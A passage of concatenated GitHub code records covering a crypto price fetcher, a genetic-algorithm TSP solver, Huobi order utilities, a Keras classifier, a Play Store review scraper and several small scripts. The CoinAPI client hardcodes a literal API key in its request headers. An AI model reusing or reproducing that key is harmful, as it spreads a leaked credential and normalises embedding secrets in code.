= get_history(start, end)\n\n with open(f\"./data/{start}--{end}.json\", \"w\") as f:\n json.dump(data, f)\n\n end = start\n start = end - datetime.timedelta(days=100)\n count += 1\n\n\ndef get_history(start: datetime.date, end: datetime.date) -> requests.Request:\n res = requests.get(\n BASE_URL + \"/v1/exchangerate/BTC/USD/history\",\n params={\n \"period_id\": \"1DAY\",\n \"time_start\": start.isoformat(),\n \"time_end\": end.isoformat(),\n },\n headers={\"X-CoinAPI-Key\": \"FC546E7C-76CF-4D89-9B01-69C5D64421E9\"},\n )\n\n if res.status_code != 200:\n raise InvalidAPIKeyError(\"Your COINAPI_API_KEY returns an error.\")\n\n return res.json()\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"davidkuda/epilot_challenge","sub_path":"src/crypto_api_client/crypto_api_client.py","file_name":"crypto_api_client.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"3419567532","text":"\"\"\"\nProject 2 - Traveling Salesman with genetic algorithm\nUses one point crossover and roulette selection of parents with a new population generational approach\nSep 20, 2023\nAuthor: Juan Lopez\nZ23635255\n\"\"\"\nimport math\n\nimport matplotlib.pyplot as plt\nimport random\n\n\ndef create_population(size, cities_array):\n \"\"\"\n Creates a population of individuals for a genetic algorithm.\n\n Args:\n size (int): The number of individuals in the population.\n cities_array (array): the original order.\n Returns:\n list: A list of different order of x,y coordinates, different path.\n \"\"\"\n population_array = []\n\n for _ in range(size):\n # Create a copy of the shuffled array\n individual = cities_array.copy()\n # Shuffle the original array in place\n random.shuffle(individual)\n\n population_array.append(individual)\n\n return population_array\n\n\ndef calculate_fitness(population):\n fitness_scores = []\n for individual in population:\n individual_distance = calculate_individual_distance(individual)\n fitness_scores.append(individual_distance)\n\n return fitness_scores\n\n\ndef calculate_individual_distance(individual):\n \"\"\"\n Calculates the total distance of a single individual\n \"\"\"\n total_distance = 0\n for i in range(len(individual) - 1):\n distance = calculate_distance(individual[i], individual[i + 1])\n total_distance += distance\n\n return total_distance\n\n\ndef calculate_distance(point1, point2):\n # Calculate the Euclidean distance between two points\n x1, y1 = point1\n x2, y2 = point2\n return math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n\n\ndef roulette_selection(population, fitness_scores):\n \"\"\"\n Selects an individual from the population using roulette wheel selection.\n\n Args:\n population (list): List of individuals in the population.\n fitness_scores (list): List of fitness scores corresponding to each individual.\n\n Returns:\n object: The selected individual.\n \"\"\"\n # Calculate the total inverted fitness score of the population\n total_fitness = sum(1.0 / score for score in fitness_scores)\n\n # Generate a random value between 0 and the total fitness score\n random_value = random.uniform(0, total_fitness)\n\n # Initialize variables for tracking the selected individual\n cumulative_fitness = 0\n selected_individual = None\n\n # Perform roulette wheel selection with inverted fitness scores\n for i in range(len(population)):\n cumulative_fitness += 1.0 / fitness_scores[i]\n if cumulative_fitness >= random_value:\n selected_individual = population[i]\n break\n\n 
return selected_individual\n\n\ndef one_point_crossover(parent1, parent2):\n \"\"\"\n Perform one-point crossover on two parent individuals for the Traveling Salesman Problem.\n\n Parameters:\n - parent1: The first parent individual (a list of cities).\n - parent2: The second parent individual (a list of cities).\n\n Returns:\n - offspring1: The first offspring individual (a list of cities).\n - offspring2: The second offspring individual (a list of cities).\n \"\"\"\n # Choose a random crossover point\n crossover_point = random.randint(1, min(len(parent1), len(parent2)) - 1)\n\n # Create the first offspring by taking the first part of parent1 and filling the rest from parent2\n offspring1 = parent1[:crossover_point]\n for city in parent2:\n if city not in offspring1:\n offspring1.append(city)\n\n # Create the second offspring by taking the first part of parent2 and filling the rest from parent1\n offspring2 = parent2[:crossover_point]\n for city in parent1:\n if city not in offspring2:\n offspring2.append(city)\n\n return offspring1, offspring2\n\n\ndef mutate(individual, mutation_rate):\n \"\"\"\n Mutates a tour by swapping two random cities with a certain mutation rate.\n\n Args:\n individual (list): A list representing the order of cities (points).\n mutation_rate (float): The probability of mutation for each pair of cities.\n\n Returns:\n list: A mutated tour.\n \"\"\"\n # Check if mutation should occur based on the mutation rate\n offspring = list(individual)\n if random.random() < mutation_rate:\n # Choose two distinct random indices for swapping\n idx1, idx2 = random.sample(range(len(offspring)), 2)\n\n # Swap the cities at the selected indices\n offspring[idx1], offspring[idx2] = offspring[idx2], offspring[idx1]\n\n return offspring\n\n\ndef create_new_generation(current_population, population_size):\n \"\"\"\n Generate a new population using one-point crossover, replaces the current population completely using a generational approach.\n\n Parameters:\n - current_population: The current population as a list of individuals.\n - population_size: The desired size of the new population.\n\n Returns:\n - new_population: The new population as a list of individuals.\n \"\"\"\n new_population = []\n\n while len(new_population) < population_size:\n # generate offspring by using one point crossover\n parent1 = roulette_selection(current_population, fitness)\n parent2 = roulette_selection(current_population, fitness)\n offspring1, offspring2 = one_point_crossover(parent1, parent2)\n new_population.append(offspring1)\n new_population.append(offspring2)\n\n # generate offspring by using mutation\n # parent1 = roulette_selection(current_population, fitness)\n # parent2 = roulette_selection(current_population, fitness)\n # offspring1 = mutate(parent1, 0.1)\n # offspring2 = mutate(parent2, 0.1)\n # new_population.append(offspring1)\n # new_population.append(offspring2)\n\n # If the new population size is larger than the desired size, truncate it\n if len(new_population) > population_size:\n new_population = new_population[:population_size]\n\n return new_population\n\n\ndef draw_plot(cities):\n # Create a scatter plot to visualize the random points\n plt.figure(figsize=(6, 6))\n # Extract x and y coordinates from the list of points using list comprehension\n x_coordinates = [point[0] for point in cities]\n y_coordinates = [point[1] for point in cities]\n plt.scatter(x_coordinates, y_coordinates, c='blue', marker='o', s=10)\n distance = calculate_individual_distance(cities)\n\n for i in 
range(len(cities) - 1):\n plt.plot([x_coordinates[i], x_coordinates[i + 1]], [y_coordinates[i], y_coordinates[i + 1]], c='red')\n\n plt.xlim(0, 200)\n plt.ylim(0, 200)\n plt.gca().invert_yaxis()\n plt.gca().set_aspect('equal', adjustable='box')\n plt.xlabel('X-axis')\n plt.ylabel('Y-axis')\n plt.title('Randomly Generated Points ' + str(distance))\n\n\nnum_cities = 25\npopulation_size = 50\ncities = [] #[[143, 141], [82, 112], [11, 22], [81, 36], [149, 84], [23, 68], [75, 35], [184, 133], [45, 154], [78, 97]]\nnew_population = []\nrecord_distance = math.inf\nfitness = []\nbest_individual = cities\ngenerations = 100\n\n# create cities\nseed = 42\nrandom.seed(seed)\nfor _ in range(num_cities):\n x = random.randint(0, 200)\n y = random.randint(0, 200)\n cities.append([x, y])\n\n# create initial population\noriginal_population = create_population(population_size, cities)\ncurrent_population = original_population[:]\nfitness = calculate_fitness(current_population)\nfor index, value in enumerate(fitness):\n if value < record_distance:\n record_distance = value\n best_individual = current_population[index]\n\n\n# run evolution for n generations\nfor i in range(generations):\n current_population = create_new_generation(current_population, population_size)\n fitness = calculate_fitness(current_population)\n for index, value in enumerate(fitness):\n if value < record_distance:\n record_distance = value\n best_individual = current_population[index]\n\nprint(record_distance)\nprint(best_individual)\nprint(calculate_individual_distance(best_individual))\n\ndraw_plot(cities)\ndraw_plot(best_individual)\nplt.show()\n","repo_name":"juandlr/cap4630-ai","sub_path":"a2_jlopezrestre2021.py","file_name":"a2_jlopezrestre2021.py","file_ext":"py","file_size_in_byte":8100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26280021505","text":"##Rename directory\n\nimport os\nimport colorama\nfrom colorama import Fore as f\n\ncolorama.init()\n\nprint(f'''\n {f.RED} ____ ______ _ __ ___ __ ___ ______\n / __ \\ / ____/ / | / / / | / |/ / / ____/ V1.00\n / /_/ / / __/ / |/ / / /| | / /|_/ / / __/ \n {f.WHITE}/ _, _/ / /___ / /| / / ___ | / / / / / /___ {os.getcwd()}\n/_/ |_| /_____/ /_/ |_/ /_/ |_| /_/ /_/ /_____/\\n''')\n\nprint(f'[*]Пример C:\\\\Users\\\\user\\\\folder\\your_folder\\\\' + ' <---------')\nprint('-' * 57)\npath = input('[!]Введите путь ------> ')\nname_of_dirs = os.listdir(path)\n\nlist_dir = []\nlist_names = []\nname_dir = ''\n\nfor i in name_of_dirs:\n if os.path.isdir(f'{path}{i}') == True:\n list_dir.append(f'{path}{i}')\n\nfor x in range(1, len(list_dir) + 1):\n name_dir = 'dir' + str(x)\n list_names.append(name_dir)\n\nfor y in range(len(list_dir)):\n os.rename(f'{list_dir[y]}',f'{path}{list_names[y]}')\n \nprint(f.GREEN + '\\n\\n[!]Папки переименованы! 
[OK]')\n#well3\ninput()\n\n\n","repo_name":"Zhauner/ManyProjects","sub_path":"RenameDir.py","file_name":"RenameDir.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5615807342","text":"from urllib import urlencode as _urlencode\n\nfrom huobi.constants import HUOBI_DEAL_TIMEOUT, HUOBI_GET_OPEN_ORDERS, HUOBI_API_URL, \\\n HUOBI_API_ONLY, HUOBI_GET_HEADERS\nfrom huobi.error_handling import is_error\n\n\nfrom data.trade import Trade\n\nfrom data_access.classes.post_request_details import PostRequestDetails\nfrom data_access.internet import send_get_request_with_header\n\nfrom utils.debug_utils import ERROR_LOG_FILE_NAME, print_to_console, LOG_ALL_MARKET_RELATED_CRAP, get_logging_level, \\\n LOG_ALL_DEBUG, DEBUG_LOG_FILE_NAME\n\nfrom enums.status import STATUS\n\nfrom utils.file_utils import log_to_file\nfrom utils.key_utils import sign_string_256_base64\nfrom utils.time_utils import ts_to_string_utc, get_now_seconds_utc\n\n\ndef get_open_orders_huobi_post_details(key, pair_name):\n final_url = HUOBI_API_URL + HUOBI_GET_OPEN_ORDERS + \"?\"\n\n # ('states', 'pre-submitted,submitted,partial-filled,partial-canceled'),\n\n body = [('AccessKeyId', key.api_key),\n ('SignatureMethod', 'HmacSHA256'),\n ('SignatureVersion', 2),\n ('Timestamp', ts_to_string_utc(get_now_seconds_utc(), '%Y-%m-%dT%H:%M:%S')),\n ('direct', ''),\n ('end_date', ''),\n ('from', ''),\n ('size', ''),\n ('start_date', ''),\n ('states', 'pre-submitted,submitted,partial-filled'),\n (\"symbol\", pair_name),\n ('types', '')\n ]\n\n message = _urlencode(body).encode('utf8')\n\n msg = \"GET\\n{base_url}\\n{path}\\n{msg1}\".format(base_url=HUOBI_API_ONLY, path=HUOBI_GET_OPEN_ORDERS, msg1=message)\n\n signature = sign_string_256_base64(key.secret, msg)\n\n body.append((\"Signature\", signature))\n\n final_url += _urlencode(body)\n\n params = {}\n\n res = PostRequestDetails(final_url, HUOBI_GET_HEADERS, params)\n\n if get_logging_level() >= LOG_ALL_MARKET_RELATED_CRAP:\n msg = \"get_open_orders_huobi: {res}\".format(res=res)\n print_to_console(msg, LOG_ALL_MARKET_RELATED_CRAP)\n log_to_file(msg, \"market_utils.log\")\n\n return res\n\n\ndef get_open_orders_huobi(key, pair_name):\n post_details = get_open_orders_huobi_post_details(key, pair_name)\n\n err_msg = \"get_orders_huobi\"\n\n status_code, res = send_get_request_with_header(post_details.final_url, post_details.headers, err_msg,\n timeout=HUOBI_DEAL_TIMEOUT)\n\n if get_logging_level() >= LOG_ALL_DEBUG:\n msg = \"get_open_orders_huobi: {r}\".format(r=res)\n print_to_console(msg, LOG_ALL_DEBUG)\n log_to_file(msg, DEBUG_LOG_FILE_NAME)\n\n orders = []\n if status_code == STATUS.SUCCESS:\n status_code, orders = get_orders_huobi_result_processor(res, pair_name)\n\n return status_code, orders\n\n\ndef get_orders_huobi_result_processor(json_document, pair_name):\n \"\"\"\n Used to parse result for order_history and open_orders end points\n\n :param json_document - response from exchange api as json string\n :param pair_name - for backwards capabilities\n\n :return pair of status code, result\n \"\"\"\n\n orders = []\n if is_error(json_document) or \"data\" not in json_document:\n # {u'status': u'error', u'err-code': u'invalid-symbol', u'data': None, u'err-msg': u'Invalid symbol.'}\n msg = \"get_open_orders_huobi_result_processor - error response - {er}\".format(er=json_document)\n log_to_file(msg, ERROR_LOG_FILE_NAME)\n\n return STATUS.FAILURE, orders\n\n for entry in 
json_document[\"data\"]:\n order = Trade.from_huobi(entry, pair_name)\n if order is not None:\n orders.append(order)\n\n return STATUS.SUCCESS, orders\n","repo_name":"kruglov-dmitry/crypto_crawler","sub_path":"huobi/order_utils.py","file_name":"order_utils.py","file_ext":"py","file_size_in_byte":3634,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"75"} +{"seq_id":"7266348304","text":"import keras\n\nfrom multimodal_classfiers.classifier import Classifier\n\n\nclass ClassifierMlp(Classifier):\n def build_model(self, input_shapes, nb_classes, hyperparameters):\n input_layers = []\n channel_outputs = []\n extra_dense_layers_no = 2\n dense_outputs = len(input_shapes) * [500]\n\n if hyperparameters is not None:\n extra_dense_layers_no = hyperparameters.extra_dense_layers_no\n dense_outputs = hyperparameters.dense_outputs\n\n for channel_id, input_shape in enumerate(input_shapes):\n input_layer = keras.layers.Input(input_shape)\n input_layers.append(input_layer)\n\n # flatten/reshape because when multivariate all should be on the same axis\n input_layer_flattened = keras.layers.Flatten()(input_layer)\n\n layer_1 = keras.layers.Dropout(0.1)(input_layer_flattened)\n layer = keras.layers.Dense(dense_outputs[channel_id], activation='relu')(layer_1)\n\n for i in range(extra_dense_layers_no):\n layer = keras.layers.Dropout(0.2)(layer)\n layer = keras.layers.Dense(dense_outputs[channel_id], activation='relu')(layer)\n\n output_layer = keras.layers.Dropout(0.3)(layer)\n channel_outputs.append(output_layer)\n\n flat = keras.layers.concatenate(channel_outputs, axis=-1) if len(channel_outputs) > 1 else channel_outputs[0]\n output_layer = keras.layers.Dense(nb_classes, activation='softmax')(flat)\n\n model = keras.models.Model(inputs=input_layers, outputs=output_layer)\n\n model.compile(loss='categorical_crossentropy', optimizer=self.get_optimizer(), metrics=['accuracy'])\n\n return model\n","repo_name":"aascode/dl-4-tsc","sub_path":"multimodal_classfiers/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"74692538482","text":"# https://www.acmicpc.net/problem/2309\n\nfrom itertools import combinations\n\nlst = []\nfor _ in range(9) :\n lst.append(int(input()))\ntmp = sum(lst) - 100\nfor i in combinations(lst, 2) :\n if tmp == sum(i) :\n a = i[0]\n b = i[1]\n break\nlst.remove(a)\nlst.remove(b)\nlst.sort()\nfor i in lst :\n print(i)","repo_name":"chanwoong1/Solved-Algorithm","sub_path":"baekjoon/codeplus/브루트 포스/2309_일곱난쟁이.py","file_name":"2309_일곱난쟁이.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30311376484","text":"import pandas as pd\nimport re\nfrom google_play_scraper import Sort, reviews_all\n\nall_ids = []\nreview_count = []\nreview_all = []\ncount = 0\nreview_list = []\n\ndef get_reviews(ids):\n for val in ids:\n # chanding the format of google playstore ids to the keywords for google play scraper\n\n url = val[1]\n function = val[18]\n try:\n match = re.search('id=(.*)', url)\n except Exception as inst:\n # print(inst)\n continue\n if match:\n id = match.group(1)\n else:\n print(\"No ID error\")\n continue\n # print(id)\n reviews = reviews_all(\n id,\n sleep_milliseconds=0, # defaults to 0\n lang='en', # defaults to 'en'\n country='us', # defaults to 'us'\n sort=Sort.MOST_RELEVANT, # defaults to Sort.MOST_RELEVANT\n 
filter_score_with= None# defaults to None(means all score)\n )\n for review in reviews:\n review_dict = {\n \"App ID\": id,\n \"Score\": review[\"score\"],\n \"Review_text\": review[\"content\"],\n \"Function\": function\n }\n review_list.append(review_dict)\n review_count.append(len(reviews))\n review_all = review_all+reviews\n\n reviews_df = pd.DataFrame(review_list)\n\n return reviews_df\n\nif __name__ == '__main__':\n\n \n input_file = 'app_details.csv' # load all the apps that we extracted from google playstore \n\n df = pd.read_csv(input_file) \n ids = df['app_id'] # for review extraction we are only using the app ids\n reviews_df = get_reviews(ids)\n reviews_df.to_csv('reviews.csv')\n\n","repo_name":"mooselab/Sports-Apps-Analysis","sub_path":"Data Collection/reviews_extraction.py","file_name":"reviews_extraction.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33825458051","text":"#find BMI and represent the table\n\nw=float(input(\"Enter your weight in kg: \"))\nh=input(\"Enter F for height entering in Foot \\nEnter M for height entering in Metre: \")\n\nif h==\"F\":\n f=float(input(\"Enter the height in foot\\n like 5.9foot: \"))\n m=f*0.3048\n print(\"your height in metere is: \",m)\n\nelif h==\"M\":\n m=float(input(\"\\nEnter the height in metre: \"))\n f=m*3.28084\n print(\"your height in foot is: \",f)\n\nelse:\n print(\"Wrong Choice!\")\n\nBMI=w/(m**2)\nprint(\"BMI is: \",BMI)\n\nif BMI < 18.5:\n print(\"\\nUNDERWEIGHT\")\n\nelif 18.5 <= BMI < 25:\n print(\"\\nNORMAL\")\n\nelif 25 <= BMI <30:\n print(\"\\nOVERWEIGHT\")\n\nelif BMI >= 30:\n print(\"\\nVERY-OVERHEIGHT\")\n\nelse :\n print(\"Wrong fied!\")\n","repo_name":"innovatorved/BasicPython","sub_path":"Data Science/w03 problem01.py","file_name":"w03 problem01.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17229981952","text":"\nimport json\nimport requests\n\nfrom datetime import datetime\nfrom invoke import task, config, call\nfrom rich.table import Table\nfrom rich.console import Console\n\nfrom gadget.tasks import init\n\nfrom azure.graphrbac import GraphRbacManagementClient\nfrom azure.common.client_factory import get_client_from_cli_profile\nfrom azure.identity import DefaultAzureCredential\nfrom azure.keyvault.secrets import SecretClient\n\n\nconsole = Console()\n\n\n@task(pre=[init.load_conf])\ndef init(ctx):\n print()\n\n\n@task(default=True, optional=['debug'])\ndef list_users(ctx, manifest=None, debug=False, role='contributor'):\n \"\"\" Initialize configuration using local* or remote project manifest file\n Parameter\n ================\n manifest: remote location for the remote project manifest file. 
default is None which will use local manifest if avaliable\n \"\"\"\n\n table = Table(\n \"Email\",\n \"DisplayName\",\n \"Enabled\",\n \"UserState\",\n \"Created\",\n \"LastLogin\",\n \"Type\",\n title=\"Artifacts\",\n )\n\n client = get_client_from_cli_profile(GraphRbacManagementClient)\n\n for user in client.users.list():\n # [ 'account_enabled', 'additional_properties', 'as_dict', 'deletion_timestamp', 'deserialize', 'display_name', 'enable_additional_properties_sending', 'from_dict', 'given_name', 'immutable_id', 'is_xml_model', 'mail', 'mail_nickname', 'object_id', 'object_type', 'serialize', 'sign_in_names', 'surname', 'usage_location', 'user_principal_name', 'user_type', 'validate']\n\n # console.print(dir(user))\n # console.print(user.additional_properties)\n\n input_datefmt = '%Y-%m-%dT%H:%M:%SZ'\n output_datefmt = '%b %d %Y'\n\n table.add_row(\n user.mail,\n user.display_name,\n str(user.account_enabled),\n user.as_dict().get('userState'),\n datetime.strftime(datetime.strptime(user.as_dict().get('createdDateTime'), input_datefmt), output_datefmt),\n datetime.strftime(datetime.strptime(user.as_dict().get('refreshTokensValidFromDateTime'), input_datefmt), output_datefmt),\n user.user_type,\n )\n\n console.print(table)\n\n # ucp = UserCreateParameters(\n # user_principal_name=\"catodevopsteam_capco.com#EXT#@catosaasdev.onmicrosoft.com\",\n # account_enabled=True,\n # display_name='Capco Digital Bot',\n # ##I test in my lab, if I use this line, I will get error log and could not create a user.\n # #additional_properties={\n # # \"signInNames\": [{\"type\": \"emailAddress\", \"value\": \"\"}]\n # #},\n # ##user_type only support Member or Guest, see this link https://docs.microsoft.com/en-us/python/api/azure.graphrbac.models.usercreateparameters?view=azure-python\n # user_type=\"Guest\",\n # mail_nickname = 'catodevopsteam_capco.com#EXT#',\n # password_profile=PasswordProfile(\n # password='',\n # force_change_password_next_login=False\n # )\n # )\n\n # user = client.users.create(ucp)\n\n@task\ndef add_user(ctx):\n\n params = {\n \"invitedUserDisplayName\": \"Capco Digital Bot\",\n \"invitedUserEmailAddress\": \"catodevopsteam@capco.com\",\n }\n\n #\n # Get the bearer token for authentication\n #\n client = get_client_from_cli_profile(GraphRbacManagementClient)\n token = client.objects.config.credentials.signed_session().headers.get('Authorization')\n\n my_headers = {\n 'Authorization': token,\n 'Content-Type': 'application/json'\n }\n\n r = requests.post(\n 'https://graph.microsoft.com/v1.0/invitations', \n headers=my_headers,\n json=json.dumps(params)\n )\n\n print(json.dumps(r.json(), indent=2))\n\n from requests import Request, Session\n\n s = Session()\n\n req = Request('POST', 'https://graph.microsoft.com/v1.0/invitations', json=json.dumps(params), headers=my_headers)\n prepped = req.prepare()\n\n resp = s.send(prepped)\n\n print(resp.status_code)\n\n print(f'curl -X GET -H \"Authorization: {token}\" -H \"Content-Type: application/json\" https://graph.microsoft.com/v1.0/invitations -d \\'{json.dumps(params)}\\'')\n\n\n@task()\ndef get_secret(ctx, keyvault, secret):\n credential = DefaultAzureCredential()\n\n secret_client = SecretClient(vault_url=\"https://my-key-vault.vault.azure.net/\", credential=credential)\n secret = secret_client.get_secret(\"secret-name\")\n\n print(secret.name)\n 
print(secret.value)\n","repo_name":"xeon22/gadget","sub_path":"gadget/tasks/azure.py","file_name":"azure.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15451959127","text":"s=int(input()) \ns1=list(map(int,input().split())) \nl1=[]\nl2=[]\nfor i in s1:\n if(i%2==0):\n l1.append(i)\n else:\n l2.append(i)\nif(len(l1)==1):\n print(*l1)\nelse:\n print(*l2)\n","repo_name":"luckysona/luckysandy","sub_path":"different number in a list.py","file_name":"different number in a list.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41478354801","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nimport os\nfrom os import path\nimport matplotlib\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--file\", type=str)\nparser.add_argument(\"--max\", type=float)\nparser.add_argument(\"--target\", type=int, default=-1)\nparser.add_argument(\"--text\", type=int, default=12)\n\nargs = parser.parse_args()\n\nmatplotlib.rc('xtick', labelsize=args.text) \nmatplotlib.rc('ytick', labelsize=args.text)\n\nstep = 0\n# s, b, a, s', b', empty\n\nn_size = 14\n\ntype_belief = 'actor' if 'a' in args.file else 'critic'\n\nwith open(args.file, newline='\\n') as csvfile:\n csvReader = csv.reader(csvfile)\n\n for row in csvReader:\n\n b = row[0].split(\";\")\n\n b = [float(el) for el in b]\n b = np.array(b)\n b = b.reshape(n_size + 1, n_size + 1)\n\n # belief\n plt.ylim(0, n_size)\n plt.xlim(0, n_size)\n plt.xlabel('Right bump position', fontsize=args.text + 2)\n plt.ylabel('Left bump position', fontsize=args.text + 2) \n plt.imshow(b)\n\n plt.grid()\n plt.clim(0, args.max)\n plt.colorbar()\n\n saved_path = args.file + '-' + type_belief\n\n if not path.exists(saved_path):\n os.mkdir(saved_path)\n\n if step == args.target:\n plt.savefig(saved_path + '/' + str(step) + \".png\", bbox_inches='tight', dpi=600)\n\n plt.close()\n step += 1\n\n","repo_name":"hai-h-nguyen/belief-grounded-network","sub_path":"scripts/plot_belief_recon.py","file_name":"plot_belief_recon.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"75"} +{"seq_id":"38290538018","text":"import re\n\ndata = \"day21.txt\"\npat = re.compile(r\"^([a-z\\s]+) \\(contains ([a-z,\\s]+)\\)$\")\ningredients = []\nallergen_reference = dict()\n\nfor i, line in enumerate(open(data)):\n ing, allerg = pat.match(line).groups()\n ingredients.append(ing.split())\n for al in allerg.split(\", \"):\n this_list = allergen_reference.get(al, list())\n this_list.append(i)\n allergen_reference[al] = this_list\n\nallergen_candidates = {\n key: set.intersection(*[set(ingredients[k]) for k in allergen_reference[key]])\n for key, value in allergen_reference.items()\n}\n\nno_ingredient = set(i for l in ingredients for i in l).difference(set.union(*(allergen_candidates.values())))\n\n\nprint(len([i for l in ingredients for i in l if i in no_ingredient]))","repo_name":"Kabiirk/advent-of-code-2020-entries","sub_path":"Day21/Day21.py","file_name":"Day21.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13767610245","text":"# Automatically creates SBTs for reads from given SRA study and queries them to a the given reference\n# USAGE: python 
create_bloom_tree.py [Study Accession Number] [0 for main drive || 1 for external drive]\nimport sys\nimport subprocess\n#import pandas as pd\nimport time\nimport datetime\nimport numpy\nimport math\nimport pdb\n\n# Start timer\nstart_time = time.time()\n\n# Set kmer size and drive to use\nkmer = str(20)\ndrive = int(sys.argv[2])\nbf_size = str(878967)\n\n# Get list of all files/directories in the mapping directory of interest\nstudy = sys.argv[1]\nif drive == 0:\n\tls = subprocess.Popen(['ls', '/home/nickeener/projects/drosophilaViruses/mapping/'+study], stdout=subprocess.PIPE)\nelse:\n\tls = subprocess.Popen(['ls', '/media/nickeener/External_Drive/'+study], stdout=subprocess.PIPE)\noutput = ls.stdout.read()\n\n# Convert output string into list containing only the SRA run accession number of each file\nreads = []\nfor i in range(len(output)):\n\tif output[i] == 'S' or output[i] == 'E' and output[i+1] == 'R':\n\t\treads.append(output[i:i+10])\n\n# Elimnate every other element from previous list (each run has a double because of forward/reverse reads)\nruns = []\nfor i in range(len(reads)):\n\tif i%2 == 1:\n\t\truns.append(reads[i])\n\n# Create bloomTree directory in correct mapping directory\nif drive == 0:\n\tnewdir = '/home/nickeener/projects/drosophilaViruses/mapping/'+study+'/bloomTrees'\nelse:\n\tnewdir = '/media/nickeener/External_Drive/'+study+'/bloomTrees'\nsubprocess.call(['mkdir', newdir])\n\n# Calculate kmer frequencies using ntcard and use to calculate appropriate bloom filter size\n'''print('ntcard --kmer='+kmer+' --threads=8 --pref='+study+' *.fastq.gz')\nsubprocess.call(['./ntcard.sh', kmer, study])\nif drive == 0:\n\tdata = pd.read_csv('/home/nickeener/projects/drosophilaViruses/mapping/'+study+'/'+study+'_k'+kmer+'.hist', header=None, sep='\\t', names=['1', '2'])\nelse:\n\tdata = pd.read_csv('/media/nickeener/External_Drive/'+study+'/'+study+'_k'+kmer+'.hist', header=None, sep='\\t', names=['1', '2'])\nbf_size = data['2'][1]-data['2'][2]\nif drive == 0:\n\tsubprocess.call(['rm', '/home/nickeener/projects/drosophilaViruses/mapping/'+study+'/'+study+'_k'+kmer+'.hist'])\nelse:\n\tsubprocess.call(['rm', '/media/nickeener/External_Drive/'+study+'/'+study+'_k'+kmer+'.hist'])\nbf_size = (bf_size+int(bf_size*.05))/1000 # Add a small portion to make a slight overstimation and divide by 1000 to get it in K format\nbf_size = str(bf_size)'''\n\n\n# For each run, call makebf to create bloom filter from each run using the bit size calculated above\n'''for run in runs:\n\tprint('~/tools/HowDeSBT/howdesbt makebf --k='+kmer+' --min=2 --bits='+bf_size+'K --threads=8 '+run+'_combined.fastq --out='+run+'.bf')\n\tsubprocess.call(['./makebf.sh', study, run, kmer, bf_size])'''\n\n# Run other howdesbt commands and query the index with the specified query\n#subprocess.call(['./cluster_build_query.sh', study, str(int(bf_size)*0.1)])\n\n# Calculate and print total run time\ntime = time.time()-start_time\nnewtime = str(datetime.timedelta(seconds=time))\n#print('Total Runtime: '+newtime)\n\n# Read output file and use regression algorithm to find average of \"empty\" (no virus) runs\n\n# Open file and remove trailing newlines\nwith open(newdir+'/queries_drosophilaViruses.dat') as file:\n\tlines = file.readlines()\nfor i in range(len(lines)):\n\tlines[i] = lines[i].rstrip()\n\n# Create a list where each element is a list with two elements, a string with the viral sequence name and a dictionary \n# with run accession numbers as keys and the corresponding kmer match proportions as their values\nmatches = 
[]\ni = 0\ncount = 0\nwhile i < len(lines):\n\tif lines[i][0] == '*':\n\t\tmatches.append([lines[i], {}])\n\t\tj = i\n\t\tj += 1\n\t\twhile j < len(lines) and lines[j][0] != '*':\n\t\t\tj += 1\n\tfor k in range(i+1, j):\n\t\tmatches[count][1][lines[k].split()[0]] = lines[k].split()[2]\n\ti = j\n\tcount += 1\n\n# Use regression algorithm to calculate average of uninfected runs\naverages = []\nfor match in matches:\n\tvalues = []\n\tvalues.append(match[1].values())\n\tlog_values = []\n\tfor value in values[0]:\n\t\tlog_values.append(math.log10(float(value)))\n\taverages.append(numpy.mean(log_values))\n\naverage = numpy.mean(averages)\nstd = numpy.std(averages)\n\n\n\nnew_average = average + 0.001\nnew_averages = []\nwhile round(average, 5) != round(new_average, 5):\n\taverage = new_average\n\tfor avg in averages:\n\t\tif avg <= average+(2*std) and avg >= math.log10(0.05):\n\t\t\tnew_averages.append(avg)\n\taverages = new_averages\n\tnew_average = numpy.mean(averages)\n\tstd = numpy.std(averages)\n\tnew_averages = []\n\nfor average in averages:\n\tprint(average)\n","repo_name":"nickeener/drosophilaViruses","sub_path":"scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21016759516","text":"from utilities.MatplotlibUtility import *\n\n\n\nplotDescription = {\n\t'name': 'Auto Gate Sweep',\n\t'plotCategory': 'parameters',\n\t'priority': 0,\n\t'dataFileDependencies': ['disabled.json'],\n\t'plotDefaults': {\n\t\t'figsize':(2,2),\n\t\t'automaticAxisLabels':True,\n\t\t'colorDefault_Drain': ['#3F51B5'],\n\t\t'colorDefault_Gate': ['#880E7F'],\n\t\t\n\t\t'xlabel':'Time',\n\t\t'ylabel':'Voltage 